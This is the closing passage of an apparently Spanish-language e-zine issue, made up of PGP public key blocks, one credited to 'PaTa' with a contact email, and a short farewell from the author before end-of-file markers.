uHn8XNQLryM9krXfEXymUbR7YIAe04ZTIu+J+7OwTU6b9UhazJFxP8p3Z4PuTaG+ oIiPOJOMf58M5IbER24sCQyEFA7D/3/PdFbeDRTPTdMjV45SF6AtJ9JcuRUlbRSA aC4nidZQERl7WFbsJwzj3Rwy1CZcyrJhYODYfNZRa9AtFQFBGYmg/ZglkXHVvAnL UDjUpOE9kPMYjQTgYrSj13zSpVm3xv9kiYYJVSGY2Vel28m72BjU0Ux70SSLszsq Cz5xZwxv6wHZjze7z7Mjydru2zBBen2fBFT/6l4sFAgq8F9M5o849JR8lsWrzqW4 O75fjKQ6gk7It/T11saiHgig9sgASUhS7/YXSXbcfLVDBxCSv5fznnCAl1wcDKMK x+G8OitXKD3vCD+nPwWqMaUYMb+CyifzMk+BGDpud9TAUTwsIf/PmuUKHkPfYjBe NOhBnJMRKlQedHx/R4fa0lCQOpacdA0e0PubyZKg/y+LNZ53fHnuGf59CO7dP7PX xrxsDuMbS6wyrZk1XCylUI8uaR0t72udjOWDzP6dN/OSiGpPTdZLRa6iRN+tXwcT uK+zsBb6CQ2aGdL6KCcmE0JjGC0p/frWze/5gEUf64YF+M7SRcyJAEYEGBECAAYF AjYHhEIACgkQ+2GK9zeXB8EmwwCfdqKk2W5iwm1jG6ICF75WRwencOoAn0BEYgEs WT2KqINEIKul1WKXCwr6 =yQRv -----END PGP PUBLIC KEY BLOCK----- PaTa // pata666@bigfoot.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com> mQGiBDYnQa4RBADAySpmFKPRfehd/ab08GUwbncNyr8WIMjdY/IzCWGli+oSu83B 2iapT6anGqBH5xA2ASe2o4787EsUTNo99G8dxERBJgraeboTOc98MRWBgr43zdWB dQM0RHh5YuLljPbaDduzrg6HG9ITlo77X+eTeVntFoIBx++zQZFNwOC9iQCg/6QB 9vVTEY45BaXjM493pwaCS2UD/RXZ0G7Y4kxMKj92N3rnzAk0/MZRg4/hjWFeoggA xP/hgYrhtOG+i4On8QOiW/uPwNBCbdpDZV9yVWUJnnyKf94GpDOIFXPuTtozMQPK ElL18XD4N6Wjza74i16P4XTmF/LvBjQO6uqirdHg7KXkACAMXUEd2pzmsuwsZSwC SsCrBAC1l+gVG6fTRLzXIMuYGIFa0DInElRdO9TpsVsQgVvGA7uEHZHfuqbEYbd/ M0LCmRGgziKR6vwMOVGjdrdihkXI6W1LB3lhbd/+7iLaIDqEY6ueVlxm5ykeWW7Z XU0+WbUp1BBSRGhxG+OcjUC5WDNVPUWfyM6+4J66ruDL6D89XrQEUGFUYYkASwQQ EQIACwUCNidBrgQLAwIBAAoJEPfOws1xxGuORS8AoIklt6Q2qrYGlq6oQBom322x 7juFAJ9ysu5iFFCh7Vu856dSGH5IYhwTJ7kDDQQ2J0GvEAwAzB13VyQ4SuLE8OiO E2eXTpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ngw+Po1gr9oSgmC66p rrNlD6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkItAjbBJstoXp18mAkK jX4t7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4 INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3b zpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9G AFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67 VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM 2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpTDJvAAICC/95sGe2RnCk DybvxA3GsMnPuE8adlaZLXc8TntbamkLCUCMEQ1Amd6CgpGMrZklKPYXjMRg+fBg +KysguhHfvxJQr6rvyds+/8+pe4i3pMzDNcuCgT2FeGBrqlZLrhJzGdnOJ6apsNI /2mg3No7SzGuA5Zu35Zhsm5d6nIMNdjxotCLxDN54EVF4n4DFuUdg/FlpZhmZ1J2 JIXplg+7bMOnKrQn8udMpMYKtWftvw5xeR03hd1/F5MVCG992eBQliibHFCJ3gCw rIponUp8n0jV/wbO9/u2SZBtTRNSpg0niZ65Uma3VCU5BKiXdrkIEK9BsvxVuATd VWPJbLTue0V/vl6kSAzD/5kVN1aD8YqqnfIU/xl0koVcASYRmKKj/Msp2pfO+ja5 sVYB3+U7QEVR0i3nxxP2up1pl+xlhCRT7pNEGup+Z4NmKlVOLMnj15/umy5O+/Ov rPQT7vaQTGgmdfHhkTLa5XN5za03rV/5lifnj84FB3tAuJ5vGgr2222JAEYEGBEC AAYFAjYnQa8ACgkQ987CzXHEa47NxACfVuwLRqh5vkGJCc/BQicjzduIPZEAoL9u ocoppCARP3t63j8QU2CUfQJ2 =vkHN -----END PGP PUBLIC KEY BLOCK----- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=( DESPEDIDA )=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Espero que les haya gustado. Esta vez puse mas empeño que nunca y, ademas, es el numero con mayor contenido hasta ahora. Les vere mas adelante ... Saludos -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=